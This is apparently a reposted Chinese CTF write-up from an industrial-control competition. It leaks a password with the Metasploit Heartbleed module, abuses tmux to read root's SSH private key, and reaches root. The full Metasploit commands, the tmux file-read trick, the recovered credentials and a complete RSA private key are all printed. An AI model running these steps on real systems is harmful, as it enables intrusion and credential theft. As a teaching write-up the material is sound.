1.开局 访问网站。
http://172.54.1.146 //查看网页源码 发现账号为feel 源码注释中
2.扫描ip的端口发现443 端口开放
疑似心脏滴血漏洞。进行构造palyoad 如下:
use auxiliary/scanner/ssl/openssl_heartbleed
set rhosts 172.54.1.146
set PORT 443
set verbose true
run
返回界面发现密码尝试登陆
返回信息中password=33890101abc
账号:feel
密码:33890101abc
3.链接ssh 进入终端
查看历史命令 发现了 falg文件和私钥
通过tumx读取了id_rsa文件
LFILE=/root/.ssh/id_rsa
tmux -f $LFILE
4.得到登陆的私钥为
-----BEGIN RSA PRIVATE KEY-----MIIEowIBAAKCAQEAv37wtp4z7mWmF+6gWJ8f81disoZhP5fdO+VDY1CtHFNj301q
swvPiiVv0datEKywwpIVvLG7k4j/4c1oLssWOAviK2eTvPcfrsae1iXMN7Q8SlCS
POfUnnpPsmUd88ZMVsDjU4uK5ajhycnEP+iMpM/hgb5crKwwMPimDi13J1YXeKJa
Iq8kf4J4HYxiqsQuPG1K3RNe0/jUWwM47OHHPXR9yhRQrs5YxZGvU2Wo6wxsdDbX
ZEODCM/oGOtaa3PWfmAZCn9zbgg+EQSkfN6VRHq9UwTU0L6MqxFBCY64D2NQskwX
MtZkbjEw0C7YdjZhAOFpmDos/8Tg7E752sn6PwIDAQABAoIBAFDhLIn1B7oI9L3m
65KCotwEbIs6dpiFa8uAaZXo3TS5g9UsvYQh2OZgKXpXUYFZbs6/JK8t4ivOEUUt
nHMnE5tYaY4rkRqexaLsAOoxzK86ULySizFuOT82KbMPQjdT6ao6jckbhu65BaRU
s67KaZyysGw8GqhTkYcdfgU+7rSNzI3FAxiRqv2ulT6bRU82VBFeQLqUACK6qTzR
y7wjf4zeg27+o/v3Zqi7CoLlgVNndw1lI8OQxn/0r9rnDqr2zuiTVhLIEU2nDoAM
k80F5g77W11FhCrKEQtSTQpm2fJtOrJJ1Hhq8ykPmwp1kNmZvamLif4tpvIB8JWy
B23bOAECgYEA7pzIoAlUC6ilNBOc98ND6dBYI/9qYnuhbge7CZzK9s36NYY+mfJb
S1/+s85jY0uttKFs4sYjgqRnNz1Ue83FMDY+LIbYjPU2Ky6DDWPDgwlpDN6MRWU6
N10oGM93KWxvokRn2EUVQ2myGeTNoJgyGbuTJthllPuAJuejwMsKqSECgYEAzXM3
Y2gu94zvcJsYhNntcaHG2ke3PYpn3MkeFIxSowDPEfsC0bfBwHKUlIv2sNLI3maB
ScWXxQv2mjiaVSBxcZuSGlSczNGtaTzRUGyfe2WsYJ2ZsZmN159EYawlbUGESAii
L4SyOWWLL4nbfZJzV4SOAYy1LOJyk1NeTS/7V18CgYEA5rrclUPv7UYqWW0Nv9cl
eJZqZIS6znhV5Ru8lNL0wCr044ToS9y6wuwUUrIkEQRA+AWQUMjf1Zg75oJ7iyuy
nagV/uB1zfffZWoYd34ctD0JQ9R/NytnW9nMyBD1XSzp1bLn540FvqYZ/kftPnlt
GMz0wf9GWwXHKdeb1PWBXYECgYBEXYKg4Zo/ZfaHUhTmoF4S4fJ50EN5hwTow0Pv
MoKNG0fMg+p8PtmKYJZwl+KPFJUi7Jk5IzdNqp101EEG8rTNSSdk+6LxxRQfYM2G
JZ8sQLkLrWXnY2F/zs/CcLZDlPmfvr+5cD6eOtwGBam0L3eSN9nJSjk/plraC3Pl
24GXoQKBgGbMnAvfpycBOrdvS9qOvoi2E/PPO6bjqG/gMtGGq9O5R79kYSvhfb6e
/mcmqHH7icTdkt9Y93JP9SME2PHEFW9Q02X9tirLQj5EtU1A6RFKCFdgpRC24pqh
tfXdSeJ9ZzX/tbeoEvmVLholvkqwenNuMUbsLmyj3tuPgmNZhCSh
-----END RSA PRIVATE KEY-----
5.进行私钥登陆
用户为root权限
6.FLAG
flag{RIMPYGK4YCQKHEOLKH5S}
公众号回复 :1
领取相应工具包
原文始发于微信公众号(盐酸网络安全):第七届全国工控CTF 赛题解析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论